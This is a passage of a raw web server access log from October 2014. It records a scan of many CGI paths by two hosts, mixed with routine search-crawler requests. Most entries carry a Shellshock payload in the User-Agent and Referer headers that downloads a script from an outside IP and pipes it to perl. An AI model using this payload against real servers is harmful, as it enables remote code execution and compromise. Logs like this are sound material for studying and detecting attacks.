/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:57 +0200] "GET /ccbill/whereami.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:55 +0200] "GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:57 +0200] "GET /catalog/index.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:58 +0200] "GET /cartcart.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:58 +0200] "GET /cart.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:59 +0200] "GET /bigconf.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:25:59 +0200] "GET /bandwidth/index.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:26:00 +0200] "GET /b2-include/b2edit.showposts.phpHTTP/1.0" 404 237 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:26:00 +0200] "GET /axis-cgi/buffer/command.cgi HTTP/1.0" 404 465 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:26:00 +0200] "GET /apps/web/vs_diag.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:26:02 +0200] "GET /aktivate/cgi-bin/catgy.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:26:02 +0200] "GET /agora.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:26:03 +0200] "GET /administrator.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:26:03 +0200] "GET /admin.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:26:03 +0200] "GET /_mt/mt.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +123.125.71.107 - - [31/Oct/2014:02:06:03 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.143 - - [31/Oct/2014:02:06:43 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.101 - - [31/Oct/2014:03:08:13 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.165 - - [31/Oct/2014:03:08:59 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.106 - - [31/Oct/2014:04:04:19 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +220.181.108.149 - - [31/Oct/2014:04:05:18 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +188.165.15.117 - - [31/Oct/2014:04:16:35 +0200] "GET /ftp/public/pictures/spherical_panoramas/sello01.html HTTP/1.1" 200 1110 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)" +220.181.108.140 - - [31/Oct/2014:05:06:12 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +123.125.71.110 - - [31/Oct/2014:05:06:18 +0200] "GET / HTTP/1.1" 200 453 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" +67.82.27.244 - - [31/Oct/2014:05:26:40 +0200] "GET /ftp/public/other/kmix_no_adjustments.jpg HTTP/1.1" 200 24611 "http://ubuntuforums.org/showthread.php?t=2178849" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" +67.82.27.244 - - [31/Oct/2014:05:26:40 +0200] "GET /ftp/public/other/alsamixer_no_adjustments.jpg HTTP/1.1" 200 100262 "http://ubuntuforums.org/showthread.php?t=2178849" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" +220.181.108.163 - - [31/Oct/2014:06:09:09 +0200] "GET /ftp/public/pictures/gallery/raatihuone_original_small.jpg HTTP/1.1" 200 93811 "http://image.baidu.com/i?ct=503316480&z=0&tn=baiduimagedetail" "Baiduspider-image+(+http://www.baidu.com/search/spider.htm)" +37.48.78.63 - - [31/Oct/2014:06:42:30 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:42:31 +0200] "GET / HTTP/1.0" 200 453 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:42:31 +0200] "GET / HTTP/1.0" 200 490 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:33 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:31 +0200] "GET /cgi-bin/ HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:34 +0200] "GET /cgi-sys/suspendedpage.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:34 +0200] "GET /xul/ HTTP/1.0" 404 442 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:35 +0200] "GET /cgi-bin/status HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:35 +0200] "GET /tmUnblock.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:35 +0200] "GET /gitweb/ HTTP/1.0" 404 445 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:35 +0200] "GET /gitweb.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:36 +0200] "GET /cgi-bin/ HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:37 +0200] "GET /cgi-bin/php HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:37 +0200] "GET /cgi-bin/php5 HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:37 +0200] "GET /cgi-bin/php4 HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:37 +0200] "GET /cgi-bin/php-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:37 +0200] "GET /cgi-bin/php.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:37 +0200] "GET /cgi-bin/firmwarecfg HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:39 +0200] "GET /cgi-bin/admin.html HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:39 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:39 +0200] "GET /sys-cgi HTTP/1.0" 404 445 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:39 +0200] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0" 404 474 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:39 +0200] "GET /cgi-bin/tree.php HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:39 +0200] "GET /cgi-bin/ICuGI/EST/blast_detail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:41 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:41 +0200] "GET /cgi-bin/w3mman2html.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:41 +0200] "GET /cgi-bin/status/status.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:41 +0200] "GET /wwwboard/wwwboard.cgi HTTP/1.0" 404 459 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:41 +0200] "GET /wwwboard.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:41 +0200] "GET /wwwadmin.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:42 +0200] "GET /webtools/bonsai/showcheckins.cgi HTTP/1.0" 404 470 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:42 +0200] "GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0" 404 470 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:42 +0200] "GET /webtools/bonsai/cvsquery.cgi HTTP/1.0" 404 466 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:43 +0200] "GET /webtools/bonsai/cvslog.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:43 +0200] "GET /webtools/bonsai/cvsblame.cgi HTTP/1.0" 404 466 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:43 +0200] "GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0" 404 467 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:43 +0200] "GET /Web_Store/web_store.cgi HTTP/1.0" 404 461 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:45 +0200] "GET /userreg.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:46 +0200] "GET /upload.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:46 +0200] "GET /tmUnblock.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:46 +0200] "GET /test.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:46 +0200] "GET /template.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:47 +0200] "GET /technote/print.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:47 +0200] "GET /submit.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:48 +0200] "GET /site_searcher.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:49 +0200] "GET /shop/normal_html.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:49 +0200] "GET /shop/member_html.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:49 +0200] "GET /SetSecurity.shmHTTP/1.0" 404 221 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:42:49 +0200] "GET /setpasswd.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:49 +0200] "GET /servers/link.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:50 +0200] "GET /scancfg.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:50 +0200] "GET /sampleposteddata.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:50 +0200] "GET /sample04.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:52 +0200] "GET /sample01.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:52 +0200] "GET /ROADS/cgi-bin/search.plHTTP/1.0" 404 229 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:42:52 +0200] "GET /reviews/newpro.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:53 +0200] "GET /redirects/redir.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:53 +0200] "GET /quikstore.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:54 +0200] "GET /pub/english.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:54 +0200] "GET /process_bug.cgi HTTP/1.0" 404 453 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:54 +0200] "GET /print.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:54 +0200] "GET /photodata/manage.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:55 +0200] "GET /photo/manage.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:55 +0200] "GET /parse_xml.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:55 +0200] "GET /page.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:56 +0200] "GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.0" 404 469 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:56 +0200] "GET /newsletter.shHTTP/1.0" 404 219 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:42:57 +0200] "GET /ncbook.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:58 +0200] "GET /mods/apage/apage.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:58 +0200] "GET /ministats/admin.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:58 +0200] "GET /megabook/admin.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:58 +0200] "GET /main.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:59 +0200] "GET /mailview.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:59 +0200] "GET /login.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:59 +0200] "GET /left.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:59 +0200] "GET /infosrch.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:42:59 +0200] "GET /info.cgi HTTP/1.0" 404 446 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:00 +0200] "GET /index.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:00 +0200] "GET /html/cgi-bin/cgicsoHTTP/1.0" 404 225 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:00 +0200] "GET /hndUnblock.cgi HTTP/1.0" 404 452 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:01 +0200] "GET /Gozila.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:01 +0200] "GET /fcgi-bin/echo2HTTP/1.0" 404 220 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:01 +0200] "GET /fcgi-bin/echoHTTP/1.0" 404 219 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:01 +0200] "GET /ez2000/ezman.cgi HTTP/1.0" 404 454 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:03 +0200] "GET /ez2000/ezadmin.cgi HTTP/1.0" 404 456 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:03 +0200] "GET /enter_bug.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:03 +0200] "GET /emumail.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:03 +0200] "GET /edittag/edittag.cgi HTTP/1.0" 404 457 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:03 +0200] "GET /download.cgi HTTP/1.0" 404 450 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:04 +0200] "GET /details.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:04 +0200] "GET /debug.cgi HTTP/1.0" 404 447 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:05 +0200] "GET /dcforum.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:05 +0200] "GET /dcboard.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:05 +0200] "GET /dcadmin.cgi HTTP/1.0" 404 449 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:05 +0200] "GET /csPassword.cgi HTTP/1.0" 404 452 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:05 +0200] "GET /CSNews.cgi HTTP/1.0" 404 448 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:06 +0200] "GET /create_release.shHTTP/1.0" 404 223 "-" "-" +37.48.78.63 - - [31/Oct/2014:06:43:06 +0200] "GET /cp/rac/nsManager.cgi HTTP/1.0" 404 458 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:06 +0200] "GET /connector.cgi HTTP/1.0" 404 451 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +37.48.78.63 - - [31/Oct/2014:06:43:06 +0200] "GET 